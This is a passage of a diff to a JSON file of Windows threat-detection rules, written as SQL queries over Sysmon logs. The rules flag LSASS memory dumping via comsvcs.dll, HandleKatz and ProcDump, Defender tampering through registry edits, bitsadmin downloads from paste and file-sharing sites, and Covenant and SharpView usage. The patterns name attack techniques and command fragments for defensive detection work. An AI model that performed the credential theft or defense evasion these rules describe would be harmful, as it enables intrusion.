different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Exotic software" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" 